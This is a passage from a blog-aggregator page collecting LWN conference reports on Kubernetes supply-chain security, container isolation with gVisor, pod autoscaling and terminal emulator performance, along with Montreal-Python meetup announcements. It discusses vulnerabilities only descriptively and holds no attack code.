A limitation of Notary is that it looks only at the last step of the build chain; in itself, it provides no guarantees on where the image comes from, how the image was built, or what it's made of. In yet another talk (slides [PDF] video), Wendy Dembowski and Lukas Puehringer introduced a possible solution to that problem: two projects that work hand-in-hand to provide end-to-end verification of the complete container supply chain. Puehringer first introduced the in-toto project as a tool to authenticate the integrity of individual build steps: code signing, continuous integration (CI), and deployment. It provides a specification for "open and extensible" metadata that certifies how each step was performed and the resulting artifacts. This could be, at the source step, as simple as a Git commit hash or, at the CI step, a build log and artifact checksums. All steps are "chained" as well, so that you can track which commit triggered the deployment of a specific image. The metadata is cryptographically signed by role keys to provide strong attestations as to the provenance and integrity of each step. The in-toto project is supervised by Justin Cappos, who also works on TUF, so it shares some of its security properties and integrates well with the framework. Each step in the build chain has its own public/private key pair, with support for role delegation and rotation.

In-toto is a generic framework allowing a complete supply chain verification by providing "attestations" that a given artifact was created by the right person using the right source. But it does not necessarily provide the hooks to do those checks in Kubernetes itself. This is where Grafeas comes in, by providing a global API to read and store metadata. That can be package versions, vulnerabilities, license or vulnerability scans, builds, images, deployments, and attestations such as those provided by in-toto. All of those can then be used by the Kubernetes admission controller to establish a policy that regulates image deployments. Dembowski referred to this tutorial by Kelsey Hightower as an example configuration to integrate Grafeas in your cluster. According to Puehringer: "It seems natural to marry the two projects together because Grafeas provides a very well-defined API where you can push metadata into, or query from, and is well integrated in the cloud ecosystem, and in-toto provides all the steps in the chain."

Dembowski said that Grafeas is already in use at Google and it has been found useful to keep track of metadata about containers. Grafeas can keep track of what each container is running, who built it, when (sometimes vulnerable) code was deployed, and make sure developers do not ship containers built on untrusted development machines. This can be useful when a new vulnerability comes out and administrators scramble to figure out if or where affected code is deployed.

Puehringer explained that in-toto's reference implementation is complete and he is working with various Linux distributions to get them to use link metadata to have their package managers perform similar verification.

Conclusion

The question of container trust hardly seems resolved at all; the available solutions are complex and would be difficult to deploy for Kubernetes rookies like me. However, it seems that Kubernetes could make small improvements to improve security and auditability, the first of which is probably setting the image pull policy to a more reasonable default. In his talk, Mouat also said it should be easier to make Kubernetes fetch images only from a trusted registry instead of allowing any arbitrary registry by default.

Beyond that, cluster operators wishing to have better control over their deployments should start looking into setting up Notary with an admission controller, maybe Portieris if they can figure out how to make it play with their own Notary servers. Considering the apparent complexity of Grafeas and in-toto, I would assume that those would probably be reserved only to larger "enterprise" deployments but who knows; Kubernetes may be complex enough as it is that people won't mind adding a service or two in there to improve its security. Keep in mind that complexity is an enemy of security, so operators should be careful when deploying solutions unless they have a good grasp of the trade-offs involved.

This article first appeared in the Linux Weekly News.

Catégories: External Blogs

Updates in container isolation

Anarcat - mer, 05/16/2018 - 12:00

This article is part of a series on KubeCon Europe 2018.

KubeCon EU At KubeCon + CloudNativeCon Europe 2018, several talks explored the topic of container isolation and security. The last year saw the release of Kata Containers which, combined with the CRI-O project, provided strong isolation guarantees for containers using a hypervisor. During the conference, Google released its own hypervisor called gVisor, adding yet another possible solution for this problem. Those new developments prompted the community to work on integrating the concept of "secure containers" (or "sandboxed containers") deeper into Kubernetes. This work is now coming to fruition; it prompts us to look again at how Kubernetes tries to keep the bad guys from wreaking havoc once they break into a container.

Attacking and defending the container boundaries

Tim Allclair's talk (slides [PDF], video) was all about explaining the possible attacks on secure containers. To simplify, Allclair said that "secure is isolation, even if that's a little imprecise" and explained that isolation is directional across boundaries: for example, a host might be isolated from a guest container, but the container might be fully visible from the host. So there are two distinct problems here: threats from the outside (attackers trying to get into a container) and threats from the inside (attackers trying to get out of a compromised container). Allclair's talk focused on the latter. In this context, sandboxed containers are concerned with threats from the inside; once the attacker is inside the sandbox, they should not be able to compromise the system any further.

Attacks can take multiple forms: untrusted code provided by users in multi-tenant clusters, un-audited code fetched from random sites by trusted users, or trusted code compromised through an unknown vulnerability. According to Allclair, defending a system from a compromised container is harder than defending a container from external threats, because there is a larger attack surface. While outside attackers only have access to a single port, attackers on the inside often have access to the kernel's extensive system-call interface, a multitude of storage backends, the internal network, daemons providing services to the cluster, hardware interfaces, and so on.

Taking those vectors one by one, Allclair first looked at the kernel and said that there were 169 code execution vulnerabilities in the Linux kernel in 2017. He admitted this was a bit of fear mongering; it indeed was a rather unusual year and "most of those were in mobile device drivers". These vulnerabilities are not really a problem for Kubernetes unless you run it on your phone. Allclair said that at least one attendee at the conference was probably doing exactly that; as it turns out, some people have managed to run Kubernetes on a vacuum cleaner. Container runtimes implement all sorts of mechanisms to reduce the kernel's attack surface: Docker has seccomp profiles, but Kubernetes turns those off by default. Runtimes will use AppArmor or SELinux rule sets. There are also ways to run containers as non-root, which was the topic of a pun-filled separate talk as well. Unfortunately, those mechanisms do not fundamentally solve the problem of kernel vulnerabilities. Allclair cited the Dirty COW vulnerability as a classic example of a container escape through race conditions on system calls that are allowed by security profiles.

The proposed solution to this problem is to add a second security boundary. This is apparently an overarching principle at Google, according to Allclair: "At Google, we have this principle security principle that between any untrusted code and user data there have to be at least two distinct security boundaries so that means two independent security mechanisms need to fail in order to for that untrusted code to get out that user data."

Adding another boundary makes attacks harder to accomplish. One such solution is to use a hypervisor like Kata Containers or gVisor. Those new runtimes depend on a sandboxed setting that is still in the proposal stage in the Kubernetes API.

gVisor as an extra boundary

Let's look at gVisor as an example hypervisor. Google spent five years developing the project in the dark before sharing it with the world. At KubeCon, it was introduced in a keynote and a more in-depth talk (slides [PDF], video) by Dawn Chen and Zhengyu He. gVisor is a user-space kernel that implements a subset of the Linux kernel API, but which was written from scratch in Go. The idea is to have an independent kernel that reduces the attack surface; while the Linux kernel has 20 million lines of code, at the time of writing gVisor only has 185,000, which should make it easier to review and audit. It provides a cleaner and simpler interface: no hardware drivers, interrupts, or I/O port support to implement, as the host operating system takes care of all that mess.

As we can see in the diagram above (taken from the talk slides), gVisor has a component called "sentry" that implements the core of the system-call logic. It uses ptrace() out of the box for portability reasons, but can also work with KVM for better security and performance, as ptrace() is slow and racy. Sentry can use KVM to map processes to CPUs and provide lower-level support like privilege separation and memory-management. He suggested thinking of gVisor as a "layered solution" to provide isolation, as it also uses seccomp filters and namespaces. He explained how it differed from user-mode Linux (UML): while UML is a port of Linux to user space, gVisor actually reimplements the Linux system calls (211 of the 319 x86-64 system calls) using only 64 system calls in the host system. Another key difference from other systems, like unikernels or Google's Native Client (NaCL), is that it can run unmodified binaries. To fix classes of attacks relying on the open() system call, gVisor also forbids any direct filesystem access; all filesystem operations go through a second process called the gopher that enforces access permissions, in another example of a double security boundary.

According to He, gVisor has a 150ms startup time and 15MB overhead, close to Kata Containers startup times, but smaller in terms of memory. He said the approach is good for small containers in high-density workloads. It is not so useful for trusted images (because it's not required), workloads that make heavy use of system calls (because of the performance overhead), or workloads that require hardware access (because that's not available at all). Even though gVisor implements a large number of system calls, some functionality is missing. There is no System V shared memory, for example, which means PostgreSQL does not work under gVisor. A simple ping might not work either, as gVisor lacks SOCK_RAW support. Linux has been in use for decades now and is more than just a set of system calls: interfaces like /proc and sysfs also make Linux what it is. ~~gVisor implements none of those~~ Of those, gVisor only implements a subset of /proc currently, with the result that some containers will not work with gVisor without modification, for now.

As an aside, the new hypervisor does allow for experimentation and development of new system calls directly in user space. The speakers confirmed this was another motivation for the project; the hope is that having a user-space kernel will allow faster iteration than working directly in the Linux kernel.

Escape from the hypervisor

Of course, hypervisors like gVisor are only a part of the solution to pod security. In his talk, Allclair warned that even with a hypervisor, there are still ways to escape a container. He cited the CVE-2017-1002101 vulnerability, which allows hostile container images to take over a host through specially crafted symbolic links. Like native containers, hypervisors like Kata Containers also allow the guest to mount filesystems across the container boundary, so they are vulnerable to such an attack.

Kubernetes fixed that specific bug, but a general solution is still in the design phase. Allclair said that ephemeral storage should be treated as opaque to the host, making sure that the host never interacts directly with image files and just passes them down to the guest untouched. Similarly, runtimes should "mount block volumes directly into the sandbox, not onto the host". Network filesystems are trickier; while it's possible to mount (say) a Ceph filesystem in the guest, that means the access credentials now reside within the guest, which moves the security boundary into the untrusted container.

Allclair outlined networking as another attack vector: Kubernetes exposes a lot of unauthenticated services on the network by default. In particular, the API server is a gold mine of information about the cluster. Another attack vector is untrusted data flows from containers to the user. For example, container logs travel through various Kubernetes components, and some components, like Fluentd, will end up parsing those logs directly. Allclair said that many different programs are "looking at untrusted data; if there's a vulnerability there, it could lead to remote code execution". When he looked at the history of vulnerabilities in that area, he could find no direct code execution, but "one of the dependencies in Fluentd for parsing JSON has seven different bugs with segfault issues so we can see that could lead to a memory vulnerability". As a possible solution to such issues, Allclair proposed isolating components in their own (native, as opposed to sandboxed) containers, which might be sufficient because Fluentd acts as a first trusted boundary.

Conclusion

A lot of work is happening to improve what is widely perceived as defective container isolation in the Linux kernel. Some take the approach of trying to run containers as regular users ("root-less containers") and rely on the Linux kernel's user-isolation properties. Others found this relies too much on the security of the kernel and use separate hypervisors, like Kata Containers and gVisor. The latter seems especially interesting because it is lightweight and doesn't add much attack surface. In comparison, Kata Containers relies on a kernel running inside the container, which actually expands the attack surface instead of reducing it. The proposed API for sandboxed containers is currently experimental in the containerd and CRI-O projects; Allclair expects the API to ship in alpha as part the Kubernetes 1.12 release.

It's important to keep in mind that hypervisors are not a panacea: they do not support all workloads because of compatibility and performance issues. A hypervisor is only a partial solution; Allclair said the next step is to provide hardened interfaces for storage, logging, and networking and encouraged people to get involved in the node special interest group and the proposal [Google Docs] on the topic.

This article first appeared in the Linux Weekly News.

Catégories: External Blogs

Montreal-Python 72: Call for speakers

Montreal Python - dim, 05/13/2018 - 23:00

We are looking for lightning talks (5min) submissions for our next event. Send your proposals at team@montrealpython.org

When

June 11th, 2018 6PM to 9PM

Where

To be determined

Catégories: External Blogs

Autoscaling for Kubernetes workloads

Anarcat - dim, 05/13/2018 - 19:00

This article is part of a series on KubeCon Europe 2018.

Technologies like containers, clusters, and Kubernetes offer the prospect of rapidly scaling the available computing resources to match variable demands placed on the system. Actually implementing that scaling can be a challenge, though. During KubeCon + CloudNativeCon Europe 2018, Frederic Branczyk from CoreOS (now part of Red Hat) held a packed session to introduce a standard and officially recommended way to scale workloads automatically in Kubernetes clusters.

Kubernetes has had an autoscaler since the early days, but only recently did the community implement a more flexible and extensible mechanism to make decisions on when to add more resources to fulfill workload requirements. The new API integrates not only the Prometheus project, which is popular in Kubernetes deployments, but also any arbitrary monitoring system that implements the standardized APIs.

The old and new autoscalers

Branczyk first covered the history of the autoscaler architecture and how it has evolved through time. Kubernetes, since version 1.2, features a horizontal pod autoscaler (HPA), which dynamically allocates resources depending on the detected workload. When the load becomes too high, the HPA increases the number of pod replicas and, when the load goes down again, it removes superfluous copies. In the old HPA, a component called Heapster would pull usage metrics from the internal cAdvisor monitoring daemon and the HPA controller would then scale workloads up or down based on those metrics.

Unfortunately, the controller would only make decisions based on CPU utilization, even though Heapster provides other metrics like disk, memory, or network usage. According to Branczyk, while in theory any workload can be converted to a CPU-bound problem, this is an inconvenient limitation, especially when implementing higher-level service level agreements. For example, an arbitrary agreement like "process 95% of requests within 100 milliseconds" would be difficult to represent as a CPU-usage problem. Another limitation is that the Heapster API was only loosely defined and never officially adopted as part of the larger Kubernetes API. Heapster also required the help of a storage backend like InfluxDB or Google's Stackdriver to store samples, which made deploying an HPA challenging.

In late 2016, the "autoscaling special interest group" (SIG autoscaling) decided that the pipeline needed a redesign that would allow scaling based on arbitrary metrics from external monitoring systems. The result is that Kubernetes 1.6 shipped with a new API specification defining how the autoscaler integrates with those systems. Having learned from the Heapster experience, the developers specified the new API, but did not implement it for any specific system. This shifts responsibility of maintenance to the monitoring vendors: instead of "dumping" their glue code in Heapster, vendors now have to maintain their own adapter conforming to a well-defined API to get certified.

The new specification defines core metrics like CPU, memory, and disk usage. Kubernetes provides a canonical implementation of those metrics through the metrics server, a stripped down version of Heapster. The metrics server provides the core metrics required by Kubernetes so that scheduling, autoscaling, and things like kubectl top work out of the box. This means that any Kubernetes 1.8 cluster now supports autoscaling using those metrics out of the box: for example minikube or Google's Kubernetes Engine both offer a native metrics server without an external database or monitoring system.

In terms of configuration syntax, the change is minimal. Here is an example of how to configure the autoscaler in earlier Kubernetes releases, taken from the OpenShift Container Platform documentation:

apiVersion: extensions/v1beta1 kind: HorizontalPodAutoscaler metadata: name: frontend spec: scaleRef: kind: DeploymentConfig name: frontend apiVersion: v1 subresource: scale minReplicas: 1 maxReplicas: 10 cpuUtilization: targetPercentage: 80

The new API configuration is more flexible:

apiVersion: autoscaling/v2beta1 kind: HorizontalPodAutoscaler metadata: name: hpa-resource-metrics-cpu spec: scaleTargetRef: apiVersion: apps/v1beta1 kind: ReplicationController name: hello-hpa-cpu minReplicas: 1 maxReplicas: 10 metrics: - type: Resource resource: name: cpu targetAverageUtilization: 50

Notice how the cpuUtilization field is replaced by a more flexible metrics field that targets CPU utilization, but can support other core metrics like memory usage.

The ultimate goal of the new API, however, is to support arbitrary metrics, through the custom metrics API. This behaves like the core metrics, except that Kubernetes does not ship or define a set of custom metrics directly, which is where systems like Prometheus come in. Branczyk demonstrated the k8s-prometheus-adapter, which connects any Prometheus metric to the Kubernetes HPA, allowing the autoscaler to add new pods to reduce request latency, for example. Those metrics are bound to Kubernetes objects (e.g. pod, node, etc.) but an "external metrics API" was also introduced in the last two months to allow arbitrary metrics to influence autoscaling. This could allow Kubernetes to scale up a workload to deal with a larger load on an external message broker service, for example.

Here is an example of the custom metrics API pulling metrics from Prometheus to make sure that each pod handles around 200 requests per second:

metrics: - type: Pods pods: metricName: http_requests targetAverageValue: 200

Here http_requests is a metric exposed by the Prometheus server which looks at how many requests each pod is processing. To avoid putting too much load on each pod, the HPA will then ensure that this number will be around a target value by spawning or killing pods as appropriate.

Upcoming features

The SIG seem to have rounded up everything quite neatly. The next step is to deprecate Heapster: as of 1.10, all critical parts of Kubernetes use the new API so a discussion is under way in another group (SIG instrumentation) to finish moving away from the older design.

Another thing the community is looking into is vertical scaling. Horizontal scaling is fine for certain workloads, like caching servers or application frontends, but database servers, most notably, are harder to scale by just adding more replicas; in this case what an autoscaler should do is increase the size of the replicas instead of their numbers. Kubernetes supports this through the vertical pod autoscaler (VPA). It is less practical than the HPA because there is a physical limit to the size of individual servers that the autoscaler cannot exceed, while the HPA can scale up as long as you add new servers. According to Branczyk, the VPA is also more "complicated and fragile, so a lot more thought needs to go into that." As a result, the VPA is currently in alpha. It is not fully compatible with the HPA and is relevant only in cases where the HPA cannot do the job: for example, workloads where there is only a single pod or a fixed number of pods like StatefulSets.

Branczyk gave a set of predictions for other improvements that could come down the pipeline. One issue he identified is that, while the HPA and VPA can scale pods, there is a different Cluster Autoscaler (CA) that manages nodes, which are the actual machines running the pods. The CA allows a cluster to move pods between the nodes to remove underutilized nodes or create new nodes to respond to demand. It's similar to the HPA, except the HPA cannot provision new hardware resources like physical machines on its own: it only creates new pods on existing nodes. The idea here is to combine to two projects into a single one to keep a uniform interface for what is really the same functionality: scaling a workload by giving it more resources.

Another hope is that OpenMetrics will emerge as a standard for metrics across vendors. This process seems to be well under way with Kubernetes already using the Prometheus library, which serves as a basis for the standard, and with commercial vendors like Datadog supporting the Prometheus API as well. Another area of possible standardization is the gRPC protocol used in some Kubernetes clusters to communicate between microservices. Those endpoints can now expose metrics through "interceptors" that get executed before the request is passed to the application. One of those interceptors is the go-grpc-prometheus adapter, which enables Prometheus to scrape metrics from any gRPC-enabled service. The ultimate goal is to have standard metrics deployed across an entire cluster, allowing the creation of reusable dashboards, alerts, and autoscaling mechanisms in a uniform system.

Conclusion

This session was one of the most popular of the conference, which shows a deep interest in this key feature of Kubernetes deployments. It was great to see Branczyk, who is involved with the Prometheus project as well, work on standardization so other systems can work with Kubernetes.

The speed at which APIs change is impressive; in only a few months, the community upended a fundamental component of Kubernetes and replaced it with a new API that users will need to become familiar with. Given the flexibility and clarity of the new API, it is a small cost to pay to represent business logic inside such a complex system. Any simplification will surely be welcome in the maelstrom of APIs and subsystems that Kubernetes has become.

A video of the talk and slides [PDF] are available. SIG autoscaling members Marcin Wielgus and Solly Ross presented an introduction (video) and deep dive (video) talks that might be interesting to our readers who want all the gory details about Kubernetes autoscaling.

This article first appeared in the Linux Weekly News.

Catégories: External Blogs

Montréal-Python 71 - Burning Yeti

Montreal Python - dim, 04/29/2018 - 23:00

Enjoy our May meetup just in time before PyCon US with these amazing speakers - 2 of which will be be presenting at PyCon!

Please RSVP on Meetup

Thanks to Google Montreal for sponsoring the event!

Presentations Survival analysis for conversion rates - Tristan Boudreault

What percentage of your users will spend? Typically, analysts use the conversion rate to assess how successful a website is at converting trial users into paying ones. But is this calculation giving us results that are lower than reality? With a talk rich in examples, Tristan will show how Shopify reframes the traditional conversion questions in survival analysis terms.

Data Science at Shopify - Françoise Provencher

Françoise is a data science technical lead at Shopify, a multi-channel commerce platform that has a decade-worth of data on a very diverse set of businesses. We’ll hear about how Python is particularly useful when it comes to understanding Shopify’s user base by sifting through tons of data.

This presentation will be in English.

Integrate Geocode data with Python - Jean Luc Semedo

Les applications intégrant des modules de géolocalisation sont de plus en plus demandées. Avec Python, il existe de nombreuses librairies permettant de gérer la géolocalisation de façon native et très simplement. Nous allons durant cette présentation en survoler quelques-unes : Geopy, pyproj, Mapnik, GeoDjango...

Jean Luc SEMEDO, Back-end and mobile developper en Freelance

Schedule
  • 6:00PM - Doors open
  • 6:30PM - Presentations
  • 8:30PM - End of the event
  • 9:00PM - Benelux
When

Monday, May 7th, 2018 at 6:00PM

Where

Google Montréal 1253 McGill College #150 Montréal, QC

Catégories: External Blogs

Call for speaker - Montréal-Python 71 - Burning Yeti

Montreal Python - dim, 04/15/2018 - 23:00

Hey!

We are looking for speakers for our next Montreal-Python meetup. Submit your proposals (up to 30 minutes) at team@montrealpython.org or come join us in our Slack if you would like to discuss about it at http://slack.mtlpy.org/

Cheers!

When

Monday, May 7th, 2018, 6:00PM-9:00PM

Where

Google Montréal 1253 McGill College #150 Montréal, QC

Full event info: http://montrealpython.org/en/2018/04/mp71

Catégories: External Blogs

A look at terminal emulators, part 2

Anarcat - sam, 04/14/2018 - 19:00

This article is the second in a two-part series about terminal emulators.

A comparison of the feature sets for a handful of terminal emulators was the subject of a recent article; here I follow that up by examining the performance of those terminals. This might seem like a lesser concern, but as it turns out, terminals exhibit surprisingly high latency for such fundamental programs. I also examine what is traditionally considered "speed" (but is really scroll bandwidth) and memory usage, with the understanding that the impact of memory use is less than it was when I looked at this a decade ago (in French).

Latency

After thorough research on terminal emulators performance, I have come to the conclusion that its most important aspect is latency. In his Typing with pleasure article, Pavel Fatin reviewed the latency of various text editors and hinted that terminal emulators might be slower than the fastest text editors. That is what eventually led me to run my own tests on terminal emulators and write this series.

But what is latency and why does it matter? In his article, Fatin defined latency as "a delay between the keystroke and corresponding screen update" and quoted the Handbook of Human-Computer Interaction which says: "Delay of visual feedback on a computer display have important effects on typist behavior and satisfaction."

Fatin explained that latency has more profound effects than just satisfaction: "typing becomes slower, more errors occur, eye strain increases, and muscle strain increases". In other words, latency can lead to typos but also to lesser code quality as it imposes extra cognitive load on the brain. But worse, "eye and muscle strain increase" seems to imply that latency can also lead to physical repetitive strain injuries.

Some of those effects have been known for a long time, with some results published in the Ergonomics journal in 1976 showing that a hundred-millisecond delay "significantly impairs the keying speed". More recently, the GNOME Human Interface Guidelines set the acceptable response time at ten milliseconds and, pushing this limit down even further, this video from Microsoft Research shows that the ideal target might even be as low as one millisecond.

Fatin performed his tests on editors, but he created a portable tool called Typometer that I used to test latency in terminal emulators. Keep in mind that the test is a simulation: in reality, we also need to take into account input (keyboard, USB controller, etc.) and output (graphics card and monitor buffers) latency. Those typically add up to more than 20ms in typical configurations, according to Fatin. With more specialized "gaming" hardware, the bare minimum is around three milliseconds. There is therefore little room for applications to add any latency to the pipeline. Fatin's goal is to bring that extra latency down to one millisecond or even zero-latency typing, which was released as part of IntelliJ IDEA 15. Here are my measurements, which include some text editors, showing that my results are consistent with Fatin's (all times in miliseconds):

Program mean std min 90% max uxterm 1.7 0.3 0.7 2 2.4 mlterm 1.8 0.3 0.7 2.2 2.5 Vim (Athena) 2.8 1.1 0.4 3.5 12.7 Vim (GTK2) 3.9 1.2 0.7 4.8 11.9 Emacs 4.8 2.3 0.5 5.8 32.5 gedit 8.9 3.4 2.8 12.5 14.2 Konsole 13.4 1.2 11.5 15 16.1 Alacritty 15.1 1.2 12.8 15.9 26.3 st 15.7 3.9 10.6 19.4 19.6 Vim (GTK3) 16.5 7.9 0.4 21.9 27.2 urxvt 18.3 0.3 17.3 18.7 19 pterm 23.4 0.9 21.7 24.5 25.4 GNOME Terminal 27.1 1 25.9 27.5 39.3 Xfce Terminal 27.4 0.4 26.4 27.9 28.7 Terminator 28.1 0.7 26.4 29 29.4

The first thing that struck me is that old programs like xterm and mlterm have the best response time, having worse case latency (2.4ms) better than the best case for all other terminals (10.6ms for st). No modern terminal crosses the ten milliseconds threshold. In particular, Alacritty doesn't seem to live up to his "fastest terminal emulator in existence" claims either, although results have improved since I first tested the program in July 2017. Indeed, the project seems to be aware of the situation and is working on improving the display pipeline with threads. We can also note that Vim using GTK3 is slower than its GTK2 counterpart by an order of magnitude. It might therefore be possible that the GTK3 framework introduces extra latency, as we can also observe other that GTK3-based terminals (Terminator, Xfce4 Terminal, and GNOME Terminal, for example) have higher latency.

You might not notice those differences. As Fatin explains: "one does not necessarily need to perceive latency consciously to be affected by it". Fatin also warns about standard deviation (the std column above and the width of error bars in the graph): "any irregularities in delay durations (so called jitter) pose additional problem because of their inherent unpredictability".

The graph above is from a clean Debian 9 (stretch) profile with the i3 window manager. That environment gives the best results in the latency test: as it turns out, GNOME introduces about 20ms of latency to all measurements. A possible explanation could be that there are programs running that synchronously handle input events: Fatin gives the example of Workrave, which adds latency by processing all input events synchronously. By default, GNOME also includes compositing window manager (Mutter), an extra buffering layer that adds at least eight milliseconds in Fatin's tests.

In the graph above, we can see the same tests performed on Fedora 27 with GNOME running on X.org. The change is drastic; latency at least doubled and in some cases is ten times larger. Forget the one millisecond target: all terminals go far beyond the ten milliseconds budget. The VTE family gets closer to fifty milliseconds with Terminology and GNOME Terminal having spikes well above that threshold. We can also see there's more jitter in those tests. Even with the added latency, we can see that mlterm and, to a lesser extent xterm still perform better than their closest competitors, Konsole and st.

Scrolling speed

The next test is the traditional "speed" or "bandwidth" test that measures how fast the terminal can scroll by displaying a large amount of text on the terminal at once. The mechanics of the test vary; the original test I found was simply to generate the same test string repeatedly using the seq command. Other tests include one from Thomas E. Dickey, the xterm maintainer, which dumps the terminfo.src file repeatedly. In another review of terminal performance, Dan Luu uses a base32-encoded string of random bytes that is simply dumped on the terminal with cat. Luu considers that kind of test to be "as useless a benchmark as I can think of" and suggests using the terminal's responsiveness during the test as a metric instead. Dickey also dismisses that test as misleading. Yet both authors recognize that bandwidth can be a problem: Luu discovered the Emacs Eshell hangs while showing large files and Dickey implemented an optimization to work around the perceived slowness of xterm. There is therefore still some value in this test as the rendering process varies a lot between terminals; it also serves as a good test harness for testing other parameters.

Here we can see rxvt and st are ahead of all others, closely followed by the much newer Alacritty, expressly designed for speed. Xfce (representing the VTE family) and Konsole are next, running at almost twice the time while xterm comes last, almost five times as slow as rxvt. During the test, xterm also had jitter in the display: it was difficult to see the actual text going by, even if it was always the same string. Konsole was fast, but it was cheating: the display would hang from time to time, showing a blank or partially drawn display. Other terminals generally display all lines faithfully, including st, Alacritty, and rxvt.

Dickey explains that performance variations are due to the design of scrollback buffers in the different terminals. Specifically, he blames the disparity on rxvt and other terminals "not following the same rules":

Unlike xterm, rxvt did not attempt to display all updates. If it fell behind, it would discard some of the updates, to catch up. Doing that had a greater effect on the apparent scrolling speed than its internal memory organization, since it was useful for any number of saved-lines. One drawback was that ASCII animations were somewhat erratic.

To fix this perceived slowness of xterm, Dickey introduced the fastScroll resource to allow xterm to drop some screen updates to catch up with the flow and, indeed, my tests confirm the resource improves performance to match rxvt. It is, however, a rather crude implementation as Dickey explains: "sometimes xterm — like konsole — appears to stop, since it is waiting for a new set of screen updates after having discarded some". In this case, it seems that other terminals found a better compromise between speed and display integrity.

Resource usage

Regardless of the worthiness of bandwidth as a performance metric, it does provide a way to simulate load on the terminals, which in turn allows us to measure other parameters like memory or disk usage. The metrics here were obtained by running the above seq benchmark under the supervision of a Python process that collected the results of getrusage() counters for ru_maxrss, the sum of ru_oublock and ru_inblock, and a simple timer for wall clock time.

St comes first in this benchmark with the smallest memory footprint, 8MB on average, which was no surprise considering the project's focus on simplicity. Slightly larger are mlterm, xterm, and rxvt at around 12MB. Another notable result is Alacritty, which takes a surprising amount of memory at 30MB. Next comes the VTE family members which vary between 40 and 60MB, a higher result that could be explained by those programs use of higher-level libraries like GTK. Konsole comes last with a whopping 65MB of memory usage during the tests, although that might be excused due to its large feature set.

Compared with the results I had a decade ago, all programs take up much more memory. Xterm used to take 4MB of memory, but now takes 15MB just on startup. A similar increase also affects rxvt, which now takes 16MB of memory out of the box. The Xfce Terminal now takes 34MB, a three-fold increase, yet GNOME Terminal only takes 20MB on startup. Of course, the previous tests were done on a 32-bit architecture. At LCA 2012, Rusty Russell also explained there are many more subtle reasons that could explain such an increase. Besides, maybe this is something we can live with in this modern day and age of multi-gigabyte core memory sizes.

Yet I can't help but feel there's a waste of resources for something so fundamental as a terminal. Those programs should be the smallest of the small and should be able to run in a shoe box, when those eventually run Linux (you know they will). Yet with those numbers, memory usage would be a concern only when running multiple terminals in anything but the most limited of environments. To compensate, GNOME Terminal, Konsole, urxvt, Terminator, and Xfce Terminal feature a daemon mode that manages multiple terminals through a single process which limits the impact of their larger memory footprint.

Another result I have found surprising in my tests is actual disk I/O: I did not expect any, yet some terminals write voluminous amounts of data to disk. It turns out the VTE library actually writes the scrollback buffer to disk, a "feature" that was noticed back in 2010 and that is still present in modern implementations. At least the file contents are now encrypted with AES256 GCM since 0.39.2, but this raises the question of what's so special about the VTE library that it requires such an exotic approach.

Conclusion

In the previous article, we found that VTE-based terminals have a good feature set, yet here we see that this comes with some performance costs. Memory isn't a big issue since all VTE terminals are spawned from a single daemon process that limits memory usage. Old systems tight on core memory might still need older terminals with lower memory usage, however. While VTE terminals behave well in bandwidth tests, their latency is higher than the criterion set in the GNOME Human Interface Guidelines, which is probably something that the developers of the VTE library should look into. Considering how inevitable the terminal is even for novice users in Linux, those improvements might make the experience slightly less traumatic. For seasoned geeks, changing from the default terminal might even mean quality improvements and less injuries during long work sessions. Unfortunately, only the old xterm and mlterm get us to the magic 10ms range, which might involve unacceptable compromises for some.

The latency benchmarks also show there are serious tradeoffs that came with the introduction of compositors in Linux graphical environments. Some users might want to take a look at conventional window managers, since they provide significant latency improvements. Unfortunately, it was not possible to run latency tests in Wayland: the Typometer program does exactly the kind of things Wayland was designed to prevent, namely inject keystrokes and spy on other windows. Hopefully, Wayland compositors are better than X.org at performance and someone will come up with a way of benchmarking latency in those environments in the future.

This article first appeared in the Linux Weekly News.

Catégories: External Blogs

A look at terminal emulators, part 1

Anarcat - jeu, 03/29/2018 - 19:00

This article is the first in a two-part series about terminal emulators.

Terminals have a special place in computing history, surviving along with the command line in the face of the rising ubiquity of graphical interfaces. Terminal emulators have replaced hardware terminals, which themselves were upgrades from punched cards and toggle-switch inputs. Modern distributions now ship with a surprising variety of terminal emulators. While some people may be happy with the default terminal provided by their desktop environment, others take great pride at using exotic software for running their favorite shell or text editor. But as we'll see in this two-part series, not all terminals are created equal: they vary wildly in terms of functionality, size, and performance.

Some terminals have surprising security vulnerabilities and most have wildly different feature sets, from support for a tabbed interface to scripting. While we have covered terminal emulators in the distant past, this article provides a refresh to help readers determine which terminal they should be running in 2018. This first article compares features, while the second part evaluates performance.

Here are the terminals examined in the series:

Terminal Debian Fedora Upstream Notes Alacritty N/A N/A 6debc4f no releases, Git head GNOME Terminal 3.22.2 3.26.2 3.28.0 uses GTK3, VTE Konsole 16.12.0 17.12.2 17.12.3 uses KDE libraries mlterm 3.5.0 3.7.0 3.8.5 uses VTE, "Multi-lingual terminal" pterm 0.67 0.70 0.70 PuTTY without ssh, uses GTK2 st 0.6 0.7 0.8.1 "simple terminal" Terminator 1.90+bzr-1705 1.91 1.91 uses GTK3, VTE urxvt 9.22 9.22 9.22 main rxvt fork, also known as rxvt-unicode Xfce Terminal 0.8.3 0.8.7 0.8.7.2 uses GTK3, VTE xterm 327 330 331 the original X terminal

Those versions may be behind the latest upstream releases, as I restricted myself to stable software that managed to make it into Debian 9 (stretch) or Fedora 27. One exception to this rule is the Alacritty project, which is a poster child for GPU-accelerated terminals written in a fancy new language (Rust, in this case). I excluded web-based terminals (including those using Electron) because preliminary tests showed rather poor performance.

Unicode support

The first feature I considered is Unicode support. The first test was to display a string that was based on a string from the Wikipedia Unicode page: "é, Δ, Й, ק ,م, ๗,あ,叶, 葉, and 말". This tests whether a terminal can correctly display scripts from all over the world reliably. xterm fails to display the Arabic Mem character in its default configuration:

By default, xterm uses the classic "fixed" font which, according to Wikipedia has "substantial Unicode coverage since 1997". Something is happening here that makes the character display as a box: only by bumping the font size to "Huge" (20 points) is the character finally displayed correctly, and then other characters fail to display correctly:

Those screenshots were generated on Fedora 27 as it gave better results than Debian 9, where some older versions of the terminals (mlterm, namely) would fail to properly fallback across fonts. Thankfully, this seems to have been fixed in later versions.

Now notice the order of the string displayed by xterm: it turns out that Mem and the following character, the Semitic Qoph, are both part of right-to-left (RTL) scripts, so technically, they should be rendered right to left when displayed. Web browsers like Firefox 57 handle this correctly in the above string. A simpler test is the word "Sarah" in Hebrew (שרה). The Wikipedia page about bi-directional text explains that:

Many computer programs fail to display bi-directional text correctly. For example, the Hebrew name Sarah (שרה) is spelled: sin (ש) (which appears rightmost), then resh (ר), and finally heh (ה) (which should appear leftmost).

